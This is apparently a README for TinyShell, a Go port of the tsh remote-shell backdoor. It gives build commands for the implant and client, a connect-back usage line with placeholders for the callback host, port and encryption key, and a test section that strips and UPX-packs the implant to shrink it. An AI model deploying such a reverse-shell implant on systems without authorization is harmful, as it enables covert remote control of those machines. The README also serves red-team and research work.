# TinyShell - Implement with Go

In development.

Currently only support connect back mode

C version: https://github.com/orangetw/tsh

## Build

### tshd

```
$ git clone https://gitlab.com/CykuTW/tsh-go
$ cd tsh-go/tshd
$ export GOOS=linux
$ go get
$ go build -ldflags="-s -w"
```

### tsh

```
$ git clone https://gitlab.com/CykuTW/tsh-go
$ cd tsh-go/tsh
$ export GOOS=linux
$ go get
$ go build -ldflags="-s -w"
```

## Usage

```
$ ./tshd -h <connect_back_host> -p <connect_back_port> -d <delay> -k <encrypt_key>
```

```
$ ./tsh -p <connect_back_port> -k <encrypt_key>
```

## Test

### filesize of tshd

```
$ go build -ldflags="-s -w"

$ ls -la tshd
-rwxr-xr-x 1 root root 2416640 Jan 27 13:08 tshd

$ ls -lah tshd
-rwxr-xr-x 1 root root 2.3M Jan 27 13:08 tshd
```

### filesize of tshd with UPX

```
$ go build -ldflags="-s -w"

$ upx --brute tshd
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   2416640 ->    727952   30.12%   linux/amd64   tshd

Packed 1 file.

$ ls -lah tshd
-rwxr-xr-x 1 root root 711K Jan 27 13:05 tshd

$ ls -la tshd
-rwxr-xr-x 1 root root 727952 Jan 27 13:05 tshd
```
